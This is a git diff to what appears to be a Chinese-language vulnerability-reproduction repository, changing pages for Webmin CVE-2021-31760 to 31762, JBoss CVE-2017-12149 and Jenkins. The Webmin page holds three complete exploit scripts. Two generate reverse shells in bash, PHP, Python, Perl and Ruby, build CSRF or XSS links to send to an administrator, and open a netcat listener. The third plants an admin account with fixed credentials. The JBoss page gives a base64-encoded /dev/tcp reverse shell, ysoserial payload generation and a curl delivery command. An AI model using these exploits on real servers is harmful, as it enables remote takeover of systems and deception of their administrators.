diff --git a/README.md b/README.md
index d0deae0..51fd9aa 100644
--- a/README.md
+++ b/README.md
@@ -656,7 +656,7 @@ _Disclaimer: The technologies, concepts, and tools provided in this Git reposito
* GoAhead Server 远程命令执行漏洞 CVE-2017-17562
* GoCD plugin 任意文件读取漏洞 CVE-2021-43287
* JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504
- * JBoss 5.x6.x 反序列化漏洞 CVE-2017-12149
+ * JBoss 5.x 6.x 反序列化漏洞 CVE-2017-12149
* JBoss JMXInvokerServlet 反序列化漏洞 CVE-2015-7501
* Jenkins checkScript 远程命令执行漏洞 CVE-2018-1000861
* Jenkins CLI 接口任意文件读取漏洞 CVE-2024-23897
@@ -793,6 +793,7 @@ _Disclaimer: The technologies, concepts, and tools provided in this Git reposito
* Apache Commons Configuration 远程命令执行漏洞 CVE-2022-33980
* Apache Commons Text 远程代码执行漏洞 CVE-2022-42889
+ * Apache CXF Aegis DataBinding 服务端请求伪造漏洞 CVE-2024-28752
* Apache Dubbo Hessian 反序列化漏洞 CVE-2020-1948
* Apache Dubbo Java反序列化漏洞 CVE-2019-17564
* Apache Flink 小于1.9.1远程代码执行 CVE-2020-17518
diff --git a/Web应用漏洞/Webmin 多个高危漏洞 CVE-2021-31760~62.md b/Web应用漏洞/Webmin 多个高危漏洞 CVE-2021-31760~62.md
index 5d483bb..50cac45 100644
--- a/Web应用漏洞/Webmin 多个高危漏洞 CVE-2021-31760~62.md
+++ b/Web应用漏洞/Webmin 多个高危漏洞 CVE-2021-31760~62.md
@@ -1,486 +1,486 @@
-# Webmin 多个高危漏洞 CVE-2021-31760~62
-
-## 漏洞描述
-
-CVE-2021-31760:利用CSRF攻击,实现对Webmin的远程命令执行。
-
-CVE-2021-31761:利用XSS攻击,实现对Webmin的远程命令执行。
-
-CVE-2021-31762:利用CSRF攻击,通过Webmin的添加用户功能创建特权用户,然后通过特权用户权限反弹shell。
-
-参考链接:
-
-- CVE-2021-31760:https://github.com/electronicbots/CVE-2021-31760
-- CVE-2021-31761:https://github.com/electronicbots/CVE-2021-31761
-- CVE-2021-31762:https://github.com/electronicbots/CVE-2021-31762
-
-## 漏洞影响
-
-```
-Webmin <= 1.973
-```
-
-## 网络测绘
-
-```
-app="Webmin"
-```
-
-## 漏洞复现
-
-CVE-2021-31760 poc:
-
-```python
-import time, subprocess,random
-
-print('''\033[1;37m
-
- __ __ _ ____ _ _________ _ _ _
-| \/ | | | |___ \| | |___ / _ \| | | | | |
-| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
-| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
-| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
-|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
- __/ |
- |___/
-
- \033[1;m''')
-
-for i in range(101):
- print(
- "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
- i), "\033[1;36m%\033[1;m", end="")
- time.sleep(0.02)
-print("\n\n")
-
-target = input(
- "\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
-
-if target.endswith('/'):
- target = target + 'proc/run.cgi'
-else:
- target = target + '/proc/run.cgi'
-
-ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m")
-
-port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m")
-
-ReverseShell = input \
-('''\033[1;37m
-\n
-1- Bash Reverse Shell \n
-2- PHP Reverse Shell \n
-3- Python Reverse Shell \n
-4- Perl Reverse Shell \n
-5- Ruby Reverse Shell \n
-\033[1;m
-
-\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''')
-
-file_name = random.randrange(1000)
-
-if ReverseShell == '1':
- ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''
-
-elif ReverseShell == '2':
- ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' '''
-
-elif ReverseShell == '3':
- ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' '''
-
-elif ReverseShell == '4':
- ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' '''
-
-elif ReverseShell == '5':
- ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' '''
-
-else:
- print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n")
-
-
-def CSRF_Generator():
- with open('CSRF_POC.html', 'w') as POC:
- POC.write \
- ('''
-
-
-
-
-
-
-
-
-
-
-
-
-
- ''')
- POC.close()
-
- print(
- "\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and wait for your Reverse Shell ^_^ \n \033[1;m")
-
-
-def Netcat_listener():
- print()
- subprocess.run(["nc", "-nlvp "+port+""])
-
-
-def main():
- CSRF_Generator()
- Netcat_listener()
-
-
-if __name__ == '__main__':
- main()
-```
-
-CVE-2021-31761 poc:
-
-```python
-import time, subprocess,random,urllib.parse
-
-
-print('''\033[1;37m
-
- __ __ _ ____ _ _________ _ _ _
-| \/ | | | |___ \| | |___ / _ \| | | | | |
-| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
-| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
-| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
-|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
- __/ |
- |___/
-
- \033[1;m''')
-
-for i in range(101):
- print(
- "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
- i), "\033[1;36m%\033[1;m", end="")
- time.sleep(0.02)
-print("\n\n")
-
-target = input(
- "\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
-
-if target.endswith('/'):
- target = target + 'tunnel/link.cgi/'
-else:
- target = target + '/tunnel/link.cgi/'
-
-ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m")
-
-port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m")
-
-ReverseShell = input \
-('''\033[1;37m
-\n
-1- Bash Reverse Shell \n
-2- PHP Reverse Shell \n
-3- Python Reverse Shell \n
-4- Perl Reverse Shell \n
-5- Ruby Reverse Shell \n
-\033[1;m
-
-\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''')
-
-file_name = random.randrange(1000)
-
-if ReverseShell == '1':
- ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''
-
-elif ReverseShell == '2':
- ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' '''
-
-elif ReverseShell == '3':
- ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' '''
-
-elif ReverseShell == '4':
- ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' '''
-
-elif ReverseShell == '5':
- ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' '''
-
-else:
- print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n")
-
-
-def CSRF_Generator():
- Payload = urllib.parse.quote('''
-
-
-
-
-
-
-
-
-
-
-
-
-
- ''')
-
- print("\033[1;36m\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \n \n\033[1;m")
-
- print(target+Payload)
-
-def Netcat_listener():
- print()
- subprocess.run(["nc", "-nlvp "+port+""])
-
-
-def main():
- CSRF_Generator()
- Netcat_listener()
-
-
-if __name__ == '__main__':
- main()
-```
-
-CVE-2021-31762 poc:
-
-```python
-import time
-
-print('''\033[1;37m
-
- __ __ _ ____ _ _________ _ _ _
-| \/ | | | |___ \| | |___ / _ \| | | | | |
-| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
-| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
-| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
-|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
- __/ |
- |___/
-
- \033[1;m''')
-
-for i in range(101):
- print(
- "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
- i), "\033[1;36m%\033[1;m", end="")
- time.sleep(0.02)
-print("\n\n")
-
-target = input(
- "\033[1;36m \nPlease input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
-
-if target.endswith('/'):
- target = target + 'acl/save_user.cgi'
-else:
- target = target + '/acl/save_user.cgi'
-
-
-def CSRF_Generator():
- with open('CSRF_POC.html', 'w') as POC:
- POC.write \
- ('''
-
-
-
-
-
-
-
-
-
-
-
-
-
- ''')
- POC.close()
-
- print(
- "\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and ur privileged user creds would be \n\nUsername: \033[1;m\033[1;37mMesh3l_Z0ldyck\033[1;m\n\033[1;36mPassword:\033[1;m \033[1;37mMesh3l_Z0ldyck123\n\033[1;m\n\n\033[1;36mHappy Hunting ^_^ \n\033[1;m")
-
-
-
-def main():
- CSRF_Generator()
-
-
-if __name__ == '__main__':
- main()
-```
-
+# Webmin 多个高危漏洞 CVE-2021-31760~62
+
+## 漏洞描述
+
+CVE-2021-31760:利用CSRF攻击,实现对Webmin的远程命令执行。
+
+CVE-2021-31761:利用XSS攻击,实现对Webmin的远程命令执行。
+
+CVE-2021-31762:利用CSRF攻击,通过Webmin的添加用户功能创建特权用户,然后通过特权用户权限反弹shell。
+
+参考链接:
+
+- CVE-2021-31760:https://github.com/electronicbots/CVE-2021-31760
+- CVE-2021-31761:https://github.com/electronicbots/CVE-2021-31761
+- CVE-2021-31762:https://github.com/electronicbots/CVE-2021-31762
+
+## 漏洞影响
+
+```
+Webmin <= 1.973
+```
+
+## 网络测绘
+
+```
+app="Webmin"
+```
+
+## 漏洞复现
+
+CVE-2021-31760 poc:
+
+```python
+import time, subprocess,random
+
+print('''\033[1;37m
+
+ __ __ _ ____ _ _________ _ _ _
+| \/ | | | |___ \| | |___ / _ \| | | | | |
+| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
+| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
+| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
+|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
+ __/ |
+ |___/
+
+ \033[1;m''')
+
+for i in range(101):
+ print(
+ "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
+ i), "\033[1;36m%\033[1;m", end="")
+ time.sleep(0.02)
+print("\n\n")
+
+target = input(
+ "\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
+
+if target.endswith('/'):
+ target = target + 'proc/run.cgi'
+else:
+ target = target + '/proc/run.cgi'
+
+ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m")
+
+port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m")
+
+ReverseShell = input \
+('''\033[1;37m
+\n
+1- Bash Reverse Shell \n
+2- PHP Reverse Shell \n
+3- Python Reverse Shell \n
+4- Perl Reverse Shell \n
+5- Ruby Reverse Shell \n
+\033[1;m
+
+\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''')
+
+file_name = random.randrange(1000)
+
+if ReverseShell == '1':
+ ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''
+
+elif ReverseShell == '2':
+ ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' '''
+
+elif ReverseShell == '3':
+ ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' '''
+
+elif ReverseShell == '4':
+ ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' '''
+
+elif ReverseShell == '5':
+ ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' '''
+
+else:
+ print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n")
+
+
+def CSRF_Generator():
+ with open('CSRF_POC.html', 'w') as POC:
+ POC.write \
+ ('''
+
+
+
+
+
+
+
+
+
+
+
+
+
+ ''')
+ POC.close()
+
+ print(
+ "\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and wait for your Reverse Shell ^_^ \n \033[1;m")
+
+
+def Netcat_listener():
+ print()
+ subprocess.run(["nc", "-nlvp "+port+""])
+
+
+def main():
+ CSRF_Generator()
+ Netcat_listener()
+
+
+if __name__ == '__main__':
+ main()
+```
+
+CVE-2021-31761 poc:
+
+```python
+import time, subprocess,random,urllib.parse
+
+
+print('''\033[1;37m
+
+ __ __ _ ____ _ _________ _ _ _
+| \/ | | | |___ \| | |___ / _ \| | | | | |
+| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
+| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
+| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
+|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
+ __/ |
+ |___/
+
+ \033[1;m''')
+
+for i in range(101):
+ print(
+ "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
+ i), "\033[1;36m%\033[1;m", end="")
+ time.sleep(0.02)
+print("\n\n")
+
+target = input(
+ "\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
+
+if target.endswith('/'):
+ target = target + 'tunnel/link.cgi/'
+else:
+ target = target + '/tunnel/link.cgi/'
+
+ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m")
+
+port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m")
+
+ReverseShell = input \
+('''\033[1;37m
+\n
+1- Bash Reverse Shell \n
+2- PHP Reverse Shell \n
+3- Python Reverse Shell \n
+4- Perl Reverse Shell \n
+5- Ruby Reverse Shell \n
+\033[1;m
+
+\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''')
+
+file_name = random.randrange(1000)
+
+if ReverseShell == '1':
+ ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''
+
+elif ReverseShell == '2':
+ ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' '''
+
+elif ReverseShell == '3':
+ ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' '''
+
+elif ReverseShell == '4':
+ ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' '''
+
+elif ReverseShell == '5':
+ ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' '''
+
+else:
+ print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n")
+
+
+def CSRF_Generator():
+ Payload = urllib.parse.quote('''
+
+
+
+
+
+
+
+
+
+
+
+
+
+ ''')
+
+ print("\033[1;36m\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \n \n\033[1;m")
+
+ print(target+Payload)
+
+def Netcat_listener():
+ print()
+ subprocess.run(["nc", "-nlvp "+port+""])
+
+
+def main():
+ CSRF_Generator()
+ Netcat_listener()
+
+
+if __name__ == '__main__':
+ main()
+```
+
+CVE-2021-31762 poc:
+
+```python
+import time
+
+print('''\033[1;37m
+
+ __ __ _ ____ _ _________ _ _ _
+| \/ | | | |___ \| | |___ / _ \| | | | | |
+| \ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __
+| |\/| |/ _ \/ __| '_ \ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /
+| | | | __/\__ \ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| <
+|_| |_|\___||___/_| |_|____/|_| (_|_) /_____\___/|_|\__,_|\__, |\___|_|\_/
+ __/ |
+ |___/
+
+ \033[1;m''')
+
+for i in range(101):
+ print(
+ "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m ) & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
+ i), "\033[1;36m%\033[1;m", end="")
+ time.sleep(0.02)
+print("\n\n")
+
+target = input(
+ "\033[1;36m \nPlease input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")
+
+if target.endswith('/'):
+ target = target + 'acl/save_user.cgi'
+else:
+ target = target + '/acl/save_user.cgi'
+
+
+def CSRF_Generator():
+ with open('CSRF_POC.html', 'w') as POC:
+ POC.write \
+ ('''
+
+
+
+
+
+
+
+
+
+
+
+
+
+ ''')
+ POC.close()
+
+ print(
+ "\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and ur privileged user creds would be \n\nUsername: \033[1;m\033[1;37mMesh3l_Z0ldyck\033[1;m\n\033[1;36mPassword:\033[1;m \033[1;37mMesh3l_Z0ldyck123\n\033[1;m\n\n\033[1;36mHappy Hunting ^_^ \n\033[1;m")
+
+
+
+def main():
+ CSRF_Generator()
+
+
+if __name__ == '__main__':
+ main()
+```
+
diff --git a/中间件漏洞/JBoss 5.x 6.x 反序列化漏洞 CVE-2017-12149.md b/中间件漏洞/JBoss 5.x 6.x 反序列化漏洞 CVE-2017-12149.md
new file mode 100644
index 0000000..00dc7c2
--- /dev/null
+++ b/中间件漏洞/JBoss 5.x 6.x 反序列化漏洞 CVE-2017-12149.md
@@ -0,0 +1,63 @@
+# JBoss 5.x 6.x 反序列化漏洞 CVE-2017-12149
+
+## 漏洞描述
+
+该漏洞为 Java 反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。
+
+参考:
+
+- https://mp.weixin.qq.com/s/zUJMt9hdGoz1TEOKy2Cgdg
+- https://access.redhat.com/security/cve/cve-2017-12149
+
+## 环境搭建
+
+Vulhub 执行以下命令启动一个 Jboss 6.0 的应用:
+
+```
+docker-compose up -d
+```
+
+首次执行时会有 1~3 分钟时间初始化,初始化完成后访问 `http://your-ip:8080/` 即可看到 JBoss 默认页面。
+
+
+
+## 漏洞复现
+
+该漏洞出现在 `/invoker/readonly` 请求中,服务器将用户提交的 POST 内容进行了 Java 反序列化:
+
+
+
+所以,我们用常规 Java 反序列化漏洞测试方法来复现该漏洞。
+
+### 编写反弹 shell 的命令
+
+我们使用 bash 来反弹 shell,但由于 `Runtime.getRuntime().exec()` 中不能使用管道符等 bash 需要的方法,我们需要用进行一次编码。
+
+```
+bash -i >& /dev/tcp/10.8.0.1/21 0>&1
+
+# base64 编码
+bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjAuMS8yMSAwPiYx} | {base64,-d} | {bash,-i}
+```
+
+### 序列化数据生成
+
+使用 [ysoserial](https://github.com/frohoff/ysoserial) 来复现生成序列化数据,由于 Vulhub 使用的 Java 版本较新,所以选择使用的 gadget 是 CommonsCollections5:
+
+```
+java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjAuMS8yMSAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser
+```
+
+### 发送 POC
+
+生成好的 POC 即为 `poc.ser`,将这个文件作为 POST Body 发送至 `/invoker/readonly` 即可:
+
+```
+curl -v POST http://your-ip:8080/invoker/readonly -H 'Content-Type: application/data' --data-binary @poc.ser
+```
+
+
+
+监听 21 端口,接收反弹 shell:
+
+
diff --git a/中间件漏洞/JBoss 5.x6.x 反序列化漏洞 CVE-2017-12149.md b/中间件漏洞/JBoss 5.x6.x 反序列化漏洞 CVE-2017-12149.md
deleted file mode 100644
index 229301d..0000000
--- a/中间件漏洞/JBoss 5.x6.x 反序列化漏洞 CVE-2017-12149.md
+++ /dev/null
@@ -1,52 +0,0 @@
-# JBoss 5.x6.x 反序列化漏洞 CVE-2017-12149
-
-## 漏洞描述
-
-该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。
-
-参考:
-
-- https://mp.weixin.qq.com/s/zUJMt9hdGoz1TEOKy2Cgdg
-- https://access.redhat.com/security/cve/cve-2017-12149
-
-## 环境搭建
-
-Vulhub运行测试环境
-
-```
-docker-compose up -d
-```
-
-首次执行时会有1~3分钟时间初始化,初始化完成后访问`http://your-ip:8080/`即可看到JBoss默认页面。
-
-## 漏洞复现
-
-该漏洞出现在`/invoker/readonly`请求中,服务器将用户提交的POST内容进行了Java反序列化:
-
-
-
-所以,我们用常规Java反序列化漏洞测试方法来复现该漏洞。
-
-### 编写反弹shell的命令
-
-我们使用bash来反弹shell,但由于`Runtime.getRuntime().exec()`中不能使用管道符等bash需要的方法,我们需要用进行一次编码。
-
-
-
-### 序列化数据生成
-
-使用[ysoserial](https://github.com/frohoff/ysoserial)来复现生成序列化数据,由于Vulhub使用的Java版本较新,所以选择使用的gadget是CommonsCollections5:
-
-```
-java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS8yMSAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser
-```
-
-### 发送POC
-
-生成好的POC即为poc.ser,将这个文件作为POST Body发送至/invoker/readonly即可:
-
-
-
-成功反弹shell:
-
-
\ No newline at end of file
diff --git a/中间件漏洞/Jenkins-CI 远程代码执行漏洞 CVE-2017-1000353.md b/中间件漏洞/Jenkins-CI 远程代码执行漏洞 CVE-2017-1000353.md
index 4788c54..073784c 100644
--- a/中间件漏洞/Jenkins-CI 远程代码执行漏洞 CVE-2017-1000353.md
+++ b/中间件漏洞/Jenkins-CI 远程代码执行漏洞 CVE-2017-1000353.md
@@ -2,9 +2,14 @@
## 漏洞描述
-攻击者可以将序列化的 Java SignedObject 对象,传输到基于远程处理的 Jenkins CLI,这将最终造成反序列化,进而绕过现有基于黑名单的保护机制。
+Jenkins 是一个广泛使用的开源自动化服务器。
-参考阅读 https://blogs.securiteam.com/index.php/archives/3171
+Jenkins 2.56 及更早版本以及 2.46.1 LTS 及更早版本存在未授权的远程代码执行漏洞。这个未经身份验证的远程代码执行漏洞允许攻击者向 Jenkins CLI 传输序列化的 Java `SignedObject` 对象,该对象会使用新的 `ObjectInputStream` 进行反序列化,从而绕过现有的基于黑名单的保护机制。
+
+参考链接:
+
+- [https://www.jenkins.io/security/advisory/2017-04-26/](https://www.jenkins.io/security/advisory/2017-04-26/)
+- [https://www.exploit-db.com/exploits/41965](https://www.exploit-db.com/exploits/41965)
## 环境搭建
@@ -14,7 +19,7 @@ Vulhub 执行如下命令启动 jenkins 2.46.1:
docker-compose up -d
```
-等待完全启动成功后,访问 `http://your-ip:8080` 即可看到 jenkins 已成功运行,无需手工安装。
+等待服务器完全启动成功后,访问 `http://your-ip:8080` 即可看到 jenkins 已成功运行,无需手工安装。
## 漏洞复现
diff --git a/中间件漏洞/images/JBoss 5.x 6.x 反序列化漏洞 CVE-2017-12149/image-20250813161006310.png b/中间件漏洞/images/JBoss 5.x 6.x 反序列化漏洞 CVE-2017-12149/image-20250813161006310.png
new file mode 100644
index 0000000..7724749
Binary files /dev/null and b/中间件漏洞/images/JBoss 5.x 6.x 反序列化漏洞 CVE-2017-12149/image-20250813161006310.png differ
diff --git a/中间件漏洞/images/JBoss 5.x 6.x 反序列化漏洞 CVE-2017-12149/image-20250813173917758.png b/中间件漏洞/images/JBoss 5.x 6.x 反序列化漏洞 CVE-2017-12149/image-20250813173917758.png
new file mode 100644
index 0000000..572c85e
Binary files /dev/null and b/中间件漏洞/images/JBoss 5.x 6.x 反序列化漏洞 CVE-2017-12149/image-20250813173917758.png differ
diff --git a/中间件漏洞/images/JBoss 5.x 6.x 反序列化漏洞 CVE-2017-12149/image-20250813175008227.png b/中间件漏洞/images/JBoss 5.x 6.x 反序列化漏洞 CVE-2017-12149/image-20250813175008227.png
new file mode 100644
index 0000000..13d4a6f
Binary files /dev/null and b/中间件漏洞/images/JBoss 5.x 6.x 反序列化漏洞 CVE-2017-12149/image-20250813175008227.png differ
diff --git a/中间件漏洞/images/JBoss 5.x 6.x 反序列化漏洞 CVE-2017-12149/image-20250814091229978.png b/中间件漏洞/images/JBoss 5.x 6.x 反序列化漏洞 CVE-2017-12149/image-20250814091229978.png
new file mode 100644
index 0000000..d8cb87f
Binary files /dev/null and b/中间件漏洞/images/JBoss 5.x 6.x 反序列化漏洞 CVE-2017-12149/image-20250814091229978.png differ
diff --git a/中间件漏洞/images/image-20230328155952101.png b/中间件漏洞/images/image-20230328155952101.png
deleted file mode 100644
